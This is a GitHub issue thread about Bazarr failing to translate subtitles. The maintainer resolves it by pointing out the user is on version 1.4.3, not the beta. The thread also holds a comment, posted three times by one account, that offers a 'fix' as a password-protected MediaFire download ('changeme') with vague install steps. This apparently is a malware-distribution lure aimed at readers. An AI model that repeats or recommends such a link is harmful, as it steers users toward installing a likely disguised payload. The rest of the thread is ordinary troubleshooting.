### ISSUE TITLE
BAZARR is unable to translate malformed subtitles

### ISSUE THREAD

**Issue by zazabozaza** [morpheus65535/bazarr#2646]
**Describe the bug**
Translating tv or movie subtitles produces BAZARR is unable to translate malformed subtitles in log. 
**To Reproduce**
1. Go to downloaded or embedded subtitle
2. Click on translate
3. Check log

**Expected behavior**
Successful translation 

Ive tried translating embedded and downloaded subtitles, neither worked. Tried applying common fixed, applying acr fixed, translating to different languages, syncing non seemed to help get it done. 

**Software (please complete the following information):**
Tried it on docker:
hotio.dev/containers/bazarr nightly-1.4.4-beta.38
and on windows [v1.4.4-beta.38]

Any help would be greatly appreciated! Thanks!

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by morpheus65535** [comment]
This issue has been solved already in 1.4.4-beta. Can you provide a debug log where you reproduce the issue?

**Comment by zazabozaza** [comment]
[bazarr (6).log](https://github.com/user-attachments/files/16832451/bazarr.6.log)

Hi @morpheus65535  thank you for the prompt response! 
In this debug I attempted to translate a downloaded subtitle and an extracted embedded subtitle they both produced the same error.

**Comment by elektron303** [comment]
It's the same issue like [#2519](https://github.com/morpheus65535/bazarr/issues/2519 )

**Comment by morpheus65535** [comment]
@zazabozaza `2024-09-01 21:25:41|DEBUG   |root                            |Bazarr version: 1.4.3|`

You're not running 1.4.4-beta.38.

**Comment by zazabozaza** [comment]
My bad! I realised I wasnt pulling the correct beta version! love your work mate
